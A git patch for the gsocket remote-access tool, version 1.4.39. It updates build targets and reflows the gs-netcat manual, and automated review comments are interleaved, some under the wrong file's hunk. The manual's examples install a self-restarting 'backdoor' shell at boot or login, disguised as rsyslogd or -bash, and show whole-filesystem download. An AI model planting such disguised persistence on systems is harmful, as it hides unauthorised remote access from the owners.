From cdfda3fdc9a231b24343b143d539e1e5ef07a60e Mon Sep 17 00:00:00 2001
From: SkyperTHC
Date: Wed, 14 Dec 2022 15:04:27 +0000
Subject: [PATCH] v1.4.39
---
 ChangeLog | 2 +-
 configure.ac | 4 +-
 deploy/deploy.sh | 5 +-
 packaging/deploy-all/mk_deploy-all.sh | 2 +-
 packaging/openwrt/gsocket/Makefile | 4 +-
 test-build/test-compile.sh | 5 +-
 tools/man_gs-netcat.h | 136 +++++++++++++-------------
 7 files changed, 82 insertions(+), 76 deletions(-)
diff --git a/ChangeLog b/ChangeLog
index ecd57167..15e0eddb 100644
--- a/ChangeLog
+++ b/ChangeLog
@@ -1,4 +1,4 @@
-1.4.39-dev - 2022-09-01
+1.4.39 - 2022-09-01
 * -t flag to check if peer is listening
 * Software emulation of PTY if /dev/ptmx is unavailable
 * Keepalive improved for Port 443 connections
diff --git a/configure.ac b/configure.ac
index 38385464..df63259a 100755
--- a/configure.ac
+++ b/configure.ac
@@ -1,6 +1,6 @@
 dnl Process this File with autoconf to produce a configure script.
 AC_PREREQ([2.69])
-AC_INIT([gsocket],[1.4.39-dev4])
+AC_INIT([gsocket],[1.4.39])
 AC_CONFIG_AUX_DIR(config)
 AC_CANONICAL_TARGET
@@ -241,7 +241,7 @@ if test x"${STATIC}" = xyes; then
 * Your MUST compile OpenSSL like this: *
 * openssl-src> *
 * ./Configure --prefix=\$HOME/usr no-dso no-threads no-shared linux-generic64 *
-* mkdir -p \$HOME/usr && make all install *
+* mkdir -p \$HOME/usr && make install_sw *
 * Only then compile gsocket \(using the same --prefix=\): *
 * gsocket-src> ./configure --prefix=\$HOME/usr --enable-static *
 * gsocket-src> make all install *
diff --git a/deploy/deploy.sh b/deploy/deploy.sh
index 62a544ce..925699be 100755
--- a/deploy/deploy.sh
+++ b/deploy/deploy.sh
@@ -562,7 +562,8 @@ init_vars()
 elif [[ $OSTYPE == *FreeBSD* ]]; then
 OSARCH="x86_64-freebsd"
 elif [[ $OSTYPE == *cygwin* ]]; then
- OSARCH="x86_64-cygwin"
+ OSARCH="i686-cygwin"
+ [[ "$arch" == "x86_64" ]] && OSARCH="x86_64-cygwin"
 # elif [[ $OSTYPE == *gnu* ]] && [[ "$(uname -v)" == *Hurd* ]]; then
 # OSARCH="i386-hurd" # debian-hurd
 fi
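Review bot: In the Cygwin branch of init_vars, `OSARCH` now defaults to `i686-cygwin` and is raised to `x86_64-cygwin` only when `$arch` equals `x86_64` exactly, but `arch` is not assigned anywhere in this hunk (the function starts and ends outside it). If `arch` is empty or unset at this point, a 64-bit Cygwin host would silently be given the 32-bit build; presumably it is filled from `uname -m` earlier in the function, which is worth confirming. A one-line comment such as `# arch comes from uname -m above; anything other than x86_64 gets the 32-bit build` would make the fallback visibly deliberate.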
@@ -1356,7 +1357,7 @@ try()
 # binaries and fail hard if none could be found.
 try_any()
 {
- targets="x86_64-alpine i386-alpine aarch64-linux arm-linux x86_64-cygwin x86_64-freebsd x86_64-osx"
+ targets="x86_64-alpine i386-alpine aarch64-linux arm-linux x86_64-osx x86_64-cygwin i686-cygwin mips32-alpine mipsel32-alpine x86_64-freebsd"
 for osarch in $targets; do
 [[ "$osarch" = "$OSARCH" ]] && continue # Skip the default OSARCH (already tried)
 try "$osarch"
diff --git a/packaging/deploy-all/mk_deploy-all.sh b/packaging/deploy-all/mk_deploy-all.sh
index 60a9a46c..48eced57 100755
--- a/packaging/deploy-all/mk_deploy-all.sh
+++ b/packaging/deploy-all/mk_deploy-all.sh
@@ -7,7 +7,7 @@ BASEDIR="$(cd "$(dirname "${0}")/../../" || exit; pwd)"
 source "${BASEDIR}/packaging/build_funcs"
-targets="x86_64-alpine i386-alpine aarch64-linux arm-linux x86_64-cygwin x86_64-freebsd x86_64-osx mips32-alpine mips64-alpine mipsel32-alpine"
+targets="x86_64-alpine i386-alpine aarch64-linux arm-linux x86_64-osx x86_64-cygwin i686-cygwin mips64-alpine mips32-alpine mipsel32-alpine x86_64-freebsd"
 # targets="x86_64-alpine x86_64-osx"
 PKG_DIR="gs-pkg"
diff --git a/packaging/openwrt/gsocket/Makefile b/packaging/openwrt/gsocket/Makefile
index 1c1bd149..88f53825 100644
--- a/packaging/openwrt/gsocket/Makefile
+++ b/packaging/openwrt/gsocket/Makefile
@@ -1,12 +1,12 @@
 include $(TOPDIR)/rules.mk
 PKG_NAME:=gsocket
-PKG_VERSION:=1.4.39-dev3
+PKG_VERSION:=1.4.39
 PKG_RELEASE:=1
 PKG_SOURCE:=$(PKG_NAME)-$(PKG_VERSION).tar.gz
 PKG_SOURCE_URL:=https://github.com/hackerschoice/gsocket/releases/download/v$(PKG_VERSION)/
-PKG_HASH:=240ee6f4b00d4e5e6de88b488c4a2982771343ad23fe6dddb6671d82d06127fc
+PKG_HASH:=2042b3773e03285939fe7f0d0597a77c8d4958644b1d8a366cc71d384f1e5c30
 PKG_MAINTAINER:=Ralf Kaiser
 PKG_LICENSE:=BSD-2-Clause
diff --git a/test-build/test-compile.sh b/test-build/test-compile.sh
index 248c8187..47ac8cc6 100755
--- a/test-build/test-compile.sh
+++ b/test-build/test-compile.sh
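Review bot: The hard-coded `targets` list in try_any() (deploy/deploy.sh) and the one in packaging/deploy-all/mk_deploy-all.sh are both edited in this commit and still disagree: mk_deploy-all.sh packages `mips64-alpine`, while try_any() never tries it. If the omission is intentional it deserves a comment next to the list, e.g. `# mips64-alpine is packaged but not tried here because <reason>`; otherwise add it so the fallback loop covers every architecture that is shipped. The loop in try_any() continues outside the hunk. Deriving both lists from one definition would stop them drifting apart at the next release.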
@@ -23,7 +23,7 @@ DIR=$(echo "$FILE" | sed 's/\.tar\.gz//')
 echo "Using:"
 (cd "${TOPDIR}" && ls -al "$FILE" && sha256sum "$FILE")
-targets+=("osx")
+# targets+=("osx")
 targets+=("sid")
 targets+=("cygwin")
 targets+=("kali64")
@@ -32,7 +32,8 @@ targets+=("arch32")
 targets+=("alpine64")
 targets+=("debian" "ubuntu")
 targets+=("centos" "linux32")
-targets+=("fbsd" "bengal")
+targets+=("fbsd")
+targets+=("bengal")
 targets+=("rpi")
 targets+=("solaris11" "solaris10")
 targets+=("openwrt")
diff --git a/tools/man_gs-netcat.h b/tools/man_gs-netcat.h
index 75d55a47..fd880f03 100644
--- a/tools/man_gs-netcat.h
+++ b/tools/man_gs-netcat.h
@@ -1,9 +1,9 @@ const char *man_str = "\ -GS-NETCAT(1) General Commands Manual GS-NETCAT(1)\n\ +GS-NETCAT(1) General Commands Manual GS-NETCAT(1)\n\ \n\ NAME\n\ - gs-netcat – transfer data, forward traffic and execute commands on a remote\n\ - host. Securely.\n\ + gs-netcat – transfer data, forward traffic and execute commands on a\n\ + remote host. Securely.\n\ \n\ SYNOPSIS\n\ gs-netcat [-rlgvqwCTSDiu] [-s secret] [-k keyfile] [-L logfile] [-d IP]\n\ @@ -17,11 +17,11 @@ DESCRIPTION\n\ workstation and another workstation on a different Local Area Network.\n\ \n\ It uses the Global Socket Relay Network (GSRN) instead of direct TCP\n\ - connections. Neither workstation needs to open a port in their firewall or\n\ - accept incoming TCP connections.\n\ + connections. Neither workstation needs to open a port in their firewall\n\ + or accept incoming TCP connections.\n\ \n\ - The connection is end-2-end encrypted using SRP (RFC 5054) with AES-256 and\n\ - a 4096 Prime. The GSRN sees only the encrypted traffic.\n\ + The connection is end-2-end encrypted using SRP (RFC 5054) with AES-256\n\ + and a 4096 Prime. The GSRN sees only the encrypted traffic.\n\ \n\ Common uses include:\n\ \n\ 
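Review bot: In test-build/test-compile.sh the `osx` target is commented out rather than removed, and no reason is given. That suggests this release was not run through the macOS compile test, although the deploy scripts in the same commit still list `x86_64-osx`. Record why and for how long on the line itself, e.g. `# targets+=("osx")  # disabled: <reason>, re-enable before the next release`, or delete the line if the target is gone for good.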
@@ -36,18 +36,20 @@ OPTIONS\n\ \n\ -d ip Destination IPv4 address for port forwarding.\n\ \n\ - -D Daemon & Watchdog mode. Start gs-netcat as a background process and\n\ - restart if killed.\n\ + -D Daemon & Watchdog mode. Start gs-netcat as a background process\n\ + and restart if killed.\n\ \n\ - -e cmd Execute command and send output to the connected client. Needs -l.\n\ + -e cmd Execute command and send output to the connected client. Needs\n\ + -l.\n\ \n\ - -g Generate a secure random password and output it to standard output.\n\ + -g Generate a secure random password and output it to standard\n\ + output.\n\ \n\ - -i Interactive login shell. The server spawns a true PTY login shell.\n\ - The client acts as a true PTY client (with Ctrl-C etc working). The\n\ - client can terminate the session by typing 'Ctrl-e q' at any time\n\ - or by typing 'exit'. The server supports multiple clients at the\n\ - same time.\n\ + -i Interactive login shell. The server spawns a true PTY login\n\ + shell. The client acts as a true PTY client (with Ctrl-C etc\n\ + working). The client can terminate the session by typing 'Ctrl-e\n\ + q' at any time or by typing 'exit'. The server supports multiple\n\ + clients at the same time.\n\ \n\ -k file\n\ A file containing the password.\n\ @@ -62,8 +64,8 @@ OPTIONS\n\ \n\ -q Quiet mode. Do not output any warnings or errors.\n\ \n\ - -r Receive-only. Do not send any data. Terminate when no more data is\n\ - available for reading.\n\ + -r Receive-only. Do not send any data. Terminate when no more data\n\ + is available for reading.\n\ \n\ -s secret\n\ A password chosen by the user. Both users need to use the same\n\ 
@@ -73,9 +75,9 @@ OPTIONS\n\ proxy. It allows multiple gs-netcat clients to (securely) relay\n\ traffic via the server. Needs -l.\n\ \n\ - -T Use TOR. The gs-netcat tool will connect via TOR to the GSRN. This\n\ - requires TOR to be installed and running. The IP and PORT of the\n\ - TOR server can be set using environment variables.\n\ + -T Use TOR. The gs-netcat tool will connect via TOR to the GSRN.\n\ + This requires TOR to be installed and running. The IP and PORT of\n\ + the TOR server can be set using environment variables.\n\ \n\ -t Connect to the GSRN (only) and check if the peer is listening. Do\n\ not connect the peer.\n\ @@ -88,9 +90,9 @@ OPTIONS\n\ -w Client to wait for the listening server to become available.\n\ \n\ CONSOLE\n\ - The interactive login shell ( -i ) has a command console. Pressing 'Ctrl-e\n\ - c' (e for EEEElite) opens the command console. The command console displays\n\ - the following information:\n\ + The interactive login shell ( -i ) has a command console. Pressing 'Ctrl-\n\ + e c' (e for EEEElite) opens the command console. The command console\n\ + displays the following information:\n\ \n\ • Latency (in milliseconds) to the remote host\n\ • Warning when a user logs into the system or becomes active\n\ 
@@ -99,30 +101,30 @@ CONSOLE\n\ Type 'help' for a list of available commands.\n\ \n\ FILETRANSFER\n\ - File transfer is available from the command console. Files are transferred\n\ - with the permission and modification timestamp unchanged. Partially\n\ - transferred files are re-started where the transfer was left off. The\n\ - 'put' command is used for uploading:\n\ + File transfer is available from the command console. Files are\n\ + transferred with the permission and modification timestamp unchanged.\n\ + Partially transferred files are re-started where the transfer was left\n\ + off. The 'put' command is used for uploading:\n\ put foobar.txt\n\ put $HOME/foobar.txt\n\ put /tmp/*.log\n\ put $(find. -type f -name '*.c')\n\ - (The above example shows Shell Variable substitution and word expansion) It\n\ - is possible to limit the amount of path information that is sent as implied\n\ - directories for each path you specify. You can insert a dot and a slash\n\ - into the source path, like this:\n\ + (The above example shows Shell Variable substitution and word expansion)\n\ + It is possible to limit the amount of path information that is sent as\n\ + implied directories for each path you specify. You can insert a dot and a\n\ + slash into the source path, like this:\n\ put /foo/./bar/baz.c\n\ - That would create /tmp/bar/baz.c on the remote machine. The 'get' command\n\ - is used for downloading:\n\ + That would create /tmp/bar/baz.c on the remote machine. The 'get'\n\ + command is used for downloading:\n\ get foobar.txt\n\ get $(find /var/./ -name '*.log')\n\ - Transferring a directory automatically transfers all files and directories\n\ - within that directory (recursively):\n\ + Transferring a directory automatically transfers all files and\n\ + directories within that directory (recursively):\n\ get /var/log\n\ get /\n\ The first command transfers all directories and files in /var/log/*. The\n\ - latter command transfers the entire filesystem. 
Multiple get/put commands\n\ - can be scheduled at the same time.\n\ + latter command transfers the entire filesystem. Multiple get/put\n\ + commands can be scheduled at the same time.\n\ \n\ EXAMPLES\n\ Example 1 - Listen for a new connection using the password 'MySecret':\n\ @@ -167,8 +169,8 @@ EXAMPLES\n\ Example 6 - TCP Port Forward all connections to 192.168.6.7:22. Server:\n\ $ gs-netcat -s MySecret -l -d 192.168.6.7 -p 22\n\ \n\ - Client to listen on TCP port 2222 and forward any new connection to the the\n\ - server. The server then forwards the connection to 192.168.6.7:22.\n\ + Client to listen on TCP port 2222 and forward any new connection to the\n\ + the server. The server then forwards the connection to 192.168.6.7:22.\n\ $ gs-netcat -s MySecret -p 2222\n\ $ ssh -p 2222 root@127.0.0.1\n\ \n\ @@ -180,8 +182,8 @@ EXAMPLES\n\ \n\ The sftp-server binary speaks the sftp-protocol to stdin/stdout. The sftp\n\ binary also speaks sftp-protocol to stdin/stdout. The tool can be used to\n\ - connect both via GSRN (encrypted) and access the SFTP server running on the\n\ - server's side from the client via the GSRN (encrypted).:\n\ + connect both via GSRN (encrypted) and access the SFTP server running on\n\ + the server's side from the client via the GSRN (encrypted).:\n\ $ export GSOCKET_ARGS='-s MySecret'\n\ $ sftp -D gs-netcat\n\ \n\ 
@@ -195,12 +197,13 @@ EXAMPLES\n\ SHELL=\"/bin/bash\" /bin/bash -c \"cd $HOME; exec -a rsyslogd\n\ /usr/local/bin/gs-netcat\"\n\ \n\ - The following line in /etc/rc.local starts a port-forward to 127.0.0.1:22:\n\ - GSOCKET_ARGS=\"-k MySecret2 -lqD -d 127.1 -p22\" /bin/bash -c \"exec -a\n\ - rsyslogd /usr/local/bin/gs-netcat\"\n\ + The following line in /etc/rc.local starts a port-forward to\n\ + 127.0.0.1:22:\n\ + GSOCKET_ARGS=\"-k MySecret2 -lqD -d 127.1 -p22\" /bin/bash -c \"exec\n\ + -a rsyslogd /usr/local/bin/gs-netcat\"\n\ \n\ - The following line in the user's ~/.profile starts the backdoor (once) when\n\ - the user logs in. All in one line:\n\ + The following line in the user's ~/.profile starts the backdoor (once)\n\ + when the user logs in. All in one line:\n\ killall -0 gs-netcat 2>/dev/null || (GSOCKET_ARGS=\"-s MySecret3\n\ -liqD\" SHELL=/bin/bash exec -a -bash /usr/local/bin/gs-netcat)\n\ \n\ @@ -216,8 +219,8 @@ ENVIRONMENT\n\ gs-netcat\n\ \n\ GSOCKET_SOCKS_IP\n\ - Specify the IP address of the TOR server (or any other SOCKS server).\n\ - Use together with -T. Default is 127.0.0.1.\n\ + Specify the IP address of the TOR server (or any other SOCKS\n\ + server). Use together with -T. Default is 127.0.0.1.\n\ \n\ GSOCKET_SOCKS_PORT\n\ The port number of the TOR server (or any other SOCKS server). Use\n\ 
@@ -237,34 +240,35 @@ SECURITY\n\ $ export GSOCKET_ARGS=\"-s MySecret\"\n\ $ gs-netcat\n\ \n\ - 1. The security is end-2-end. This means from User-2-User (and not just to\n\ - the GSRN). The GSRN relays only (encrypted) data to and from the users.\n\ + 1. The security is end-2-end. This means from User-2-User (and not just\n\ + to the GSRN). The GSRN relays only (encrypted) data to and from the\n\ + users.\n\ \n\ - 2. The session is 256 bit and ephemeral. It is freshly generated for every\n\ - session and generated randomly (and is not based on the password). It uses\n\ - OpenSSL's SRP with AES-256 and a 4096 Prime.\n\ + 2. The session is 256 bit and ephemeral. It is freshly generated for\n\ + every session and generated randomly (and is not based on the password).\n\ + It uses OpenSSL's SRP with AES-256 and a 4096 Prime.\n\ \n\ 3. The password can be 'weak' without weakening the security of the\n\ session. A brute force attack against a weak password requires a new TCP\n\ connection for every guess.\n\ \n\ 4. Do not use stupid passwords like 'password123'. Malice might pick the\n\ - same (stupid) password by chance and connect. If in doubt use gs-netcat -g\n\ - to generate a strong one. Alice's and Bob's password should at least be\n\ - strong enough so that Malice can not guess it by chance while Alice is\n\ + same (stupid) password by chance and connect. If in doubt use gs-netcat\n\ + -g to generate a strong one. Alice's and Bob's password should at least\n\ + be strong enough so that Malice can not guess it by chance while Alice is\n\ waiting for Bob to connect.\n\ \n\ - 5. If Alice shares the same password with Bob and Charlie and either one of\n\ - them connects then Alice can not tell if it is Bob or Charlie who\n\ + 5. If Alice shares the same password with Bob and Charlie and either one\n\ + of them connects then Alice can not tell if it is Bob or Charlie who\n\ connected.\n\ \n\ 6. Assume Alice shares the same password with Bob and Malice. 
When Alice\n\ - stops listening for a connection then Malice could start to listen for the\n\ - connection instead. Bob (when opening a new connection) can not tell if he\n\ - is connecting to Alice or to Malice. Use -a if you worry about\n\ - this. TL;DR: When sharing the same password with a group larger than 2 then\n\ - it is assumed that everyone in that group plays nicely. Otherwise use SSH\n\ - over the GS/TLS connection.\n\ + stops listening for a connection then Malice could start to listen for\n\ + the connection instead. Bob (when opening a new connection) can not tell\n\ + if he is connecting to Alice or to Malice. Use -a if you worry\n\ + about this. TL;DR: When sharing the same password with a group larger\n\ + than 2 then it is assumed that everyone in that group plays nicely.\n\ + Otherwise use SSH over the GS/TLS connection.\n\ \n\ 7. SRP has Perfect Forward Secrecy. This means that past sessions can not\n\ be decrypted even if the password becomes known.\n\ @@ -282,5 +286,5 @@ BUGS\n\ whatever circumstances, please notify me (skyper@thc.org) and tell me how\n\ you think it should behave.\n\ \n\ -macOS 12.5 October 8, 2020 macOS 12.5\n\ +macOS 13.0 October 8, 2020 macOS 13.0\n\ ";